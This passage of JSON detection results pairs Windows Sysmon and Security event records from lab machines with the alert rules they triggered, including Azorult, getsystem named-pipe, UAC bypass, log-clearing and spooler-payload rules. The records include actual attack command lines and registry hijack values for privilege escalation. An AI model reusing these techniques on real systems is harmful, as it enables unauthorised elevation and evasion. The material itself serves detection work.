Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\Start","UtcTime":"2019-04-30 07:46:15.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8573,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.199614Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"cmd.exe /c echo msdhch > \\\\.\\pipe\\msdhch","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\ImagePath","UtcTime":"2019-04-30 07:46:15.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8574,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.199614Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Meterpreter or Cobalt Strike Getsystem Service Start"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /c echo msdhch > \\\\.\\pipe\\msdhch","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-F6A1-5CC7-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ParentProcessId":468,"ProcessGuid":"365ABB72-FD47-5CC7-0000-00106AF61D00","ProcessId":4088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 07:46:15.183"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8575,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.215239Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\Start","UtcTime":"2019-04-30 07:46:15.230"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8576,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.246489Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 12:32:34.721","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-7EE2-5D45-0000-00104E852801","ProcessId":5284,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\MSCOREE.DLL","UtcTime":"2019-08-03 12:32:34.721"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5494,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:32:34.875974Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"IEWIN7","Correlation":null,"EventID":1102,"EventRecordID":18195,"Execution_attributes":{"ProcessID":780,"ThreadID":3812},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:10:06.342445Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"IEWIN7","SubjectLogonId":"0x1371b","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-09 02:52:18.765","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-9570-5CD3-0000-00103FC90A00","ProcessId":1900,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\wscript.exe.manifest","UtcTime":"2019-05-09 02:52:18.765"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":11219,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:52:18.765888Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2018-01-03 01:21:25.726","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"365ABB72-95E7-5CD3-0000-001046950F00","ProcessId":2812,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData:tghjx5xz2ky.vbs","UtcTime":"2019-05-09 02:52:23.500"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":11241,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:52:23.500263Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5E6A-5D45-0000-001076639D00","ProcessId":4440,"RuleName":"PrivEsc - UAC bypass UACME-33","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-03 10:14:02.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5272,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:14:02.929209Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5E6A-5D45-0000-001076639D00","ProcessId":4440,"RuleName":"PrivEsc - UAC bypass UACME-33","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\(Default)","UtcTime":"2019-08-03 10:14:02.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5273,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:14:02.934826Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bypass UAC via Fodhelper.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\fodhelper.exe\" ","ParentImage":"C:\\Windows\\System32\\fodhelper.exe","ParentProcessGuid":"747F3D96-5E6F-5D45-0000-001014CA9D00","ParentProcessId":8180,"ProcessGuid":"747F3D96-5E70-5D45-0000-0010FCDD9D00","ProcessId":3656,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-03 10:14:08.401"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5277,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:14:08.472102Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Tool UACMe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\Akagi64.exe\" 64","Company":"Integrity Investment LLC","CurrentDirectory":"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\","Description":"Pentesting utility","FileVersion":"3.5.1.2010","Hashes":"SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891","Image":"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\Akagi64.exe","IntegrityLevel":"Medium","LogonGuid":"23F38D93-AE9B-5F8E-8CED-170000000000","LogonId":"0x17ed8c","OriginalFileName":"Akagi.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"23F38D93-AF70-5F8E-1E02-000000000C00","ParentProcessId":5592,"ProcessGuid":"23F38D93-CF1E-5F8E-C808-000000000C00","ProcessId":8712,"Product":"UACMe","RuleName":"technique_id=T1059.001,technique_name=PowerShell","TerminalSessionId":2,"User":"DESKTOP-NTSSLJD\\den","UtcTime":"2020-10-20 11:50:54.800"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":1,"EventRecordID":622,"Execution_attributes":{"ProcessID":7212,"ThreadID":9748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:54.810152Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using IEInstal - File","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-20 11:50:55.442","Image":"C:\\Program Files\\Internet Explorer\\IEInstal.exe","ProcessGuid":"23F38D93-CF1F-5F8E-CA08-000000000C00","ProcessId":8736,"RuleName":"-","TargetFilename":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","UtcTime":"2020-10-20 11:50:55.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":11,"EventRecordID":768,"Execution_attributes":{"ProcessID":7212,"ThreadID":9748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:55.450643Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-20 11:50:56.082","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"23F38D93-CF1E-5F8E-C808-000000000C00","ProcessId":8712,"RuleName":"-","TargetFilename":"C:\\Users\\den\\AppData\\Local\\Temp\\[1]consent.exe","UtcTime":"2020-10-20 11:50:56.082"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":11,"EventRecordID":877,"Execution_attributes":{"ProcessID":7212,"ThreadID":9748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:56.090214Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Driver Load from Temp"],"event":{"Event":{"EventData":{"Company":"Integrity Investment LLC","Description":"UACMe proxy DLL","FileVersion":"3.5.1.2010","Hashes":"SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6","Image":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","ImageLoaded":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","OriginalFileName":"Fubuki.dll","ProcessGuid":"23F38D93-CF20-5F8E-CE08-000000000C00","ProcessId":6896,"Product":"UACMe","RuleName":"technique_id=T1073,technique_name=DLL Side-Loading","Signature":"-","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-10-20 11:50:56.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":7,"EventRecordID":964,"Execution_attributes":{"ProcessID":7212,"ThreadID":5064},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:56.531639Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 10:51:46.599","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-6742-5D45-0000-00104A66B500","ProcessId":6380,"RuleName":"PrivEsc - UAC Bypass UACME 32","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\OskSupport.dll","UtcTime":"2019-08-03 10:51:46.599"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5305,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:51:46.647421Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\System32\\cmd.exe /c notepad.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-88DC-5CD3-0000-00100DA51A00","ProcessId":2704,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\exefile\\shell\\runas\\command\\IsolatedCommand","UtcTime":"2019-05-09 02:07:51.100"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11122,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:07:51.116072Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /c notepad.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-863B-5CD3-0000-00204A390100","LogonId":"0x1394a","ParentCommandLine":"?","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"365ABB72-8B77-5CD3-0000-0010E8FD2900","ParentProcessId":3836,"ProcessGuid":"365ABB72-8B80-5CD3-0000-001065512A00","ProcessId":2264,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 02:08:00.336"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11126,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:08:00.446150Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"alice.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":25048,"Execution_attributes":{"ProcessID":748,"ThreadID":6064},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-11-15T08:19:02.298512Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x1c363a4","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-1005675359-741490361-30848483-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious Binary Load"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Microsoft Application Virtualization Terminator","FileVersion":"10.0.18362.1 (WinBuild.160101.0800)","Hashes":"SHA1=D66B48C663F435419913D65E64ED4845CB9BC882,MD5=0419B6B1CCE7FA295A3DC1823E0AD685,SHA256=60BCF03195AE55304114E4AECD800C15C3F15DDDC91B742B4F5A9624494CCA65,IMPHASH=F578F8B5F8EA1AA29D7B69CDB8565B2E","Image":"C:\\Windows\\System32\\spoolsv.exe","ImageLoaded":"C:\\Windows\\System32\\AppVTerminator.dll","ProcessGuid":"6A3C3EF2-8168-5FBF-0000-0010435A0100","ProcessId":2032,"Product":"Microsoft® Windows® Operating System","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-11-26 10:45:07.672"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":7,"EventRecordID":343368,"Execution_attributes":{"ProcessID":8124,"ThreadID":7540},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-11-26T10:45:07.686999Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious Binary Load"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=4B0D3EF916C4D5E4249DC62E0A1A2307C495E3FB,MD5=C957DB23045704214C1A53260598FC85,SHA256=7C1B045BB80761F9E9EDD9B8B7A53D9C374CA0C78926F7AEE1EACCC32EC3B198,IMPHASH=8DEF796746DD54062D5B3186EEF39356","Image":"C:\\Windows\\System32\\spoolsv.exe","ImageLoaded":"C:\\Windows\\System32\\spool\\drivers\\x64\\4\\payload.dll","ProcessGuid":"6A3C3EF2-8739-5FBF-0000-001075514700","ProcessId":8716,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-11-26 10:45:23.976"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":7,"EventRecordID":343371,"Execution_attributes":{"ProcessID":8124,"ThreadID":7540},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-11-26T10:45:24.216387Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\Windows\\System32\\cmd.exe","EventType":"SetValue","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-7D80-5CD5-0000-00100AD01300","ProcessId":2796,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\mscfile\\shell\\open\\command\\(Default)","UtcTime":"2019-05-10 13:32:48.397"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":15676,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:32:48.412971Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery","Run Whoami Showing Privileges"],"event":{"Event":{"EventData":{"CommandLine":"whoami /priv","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 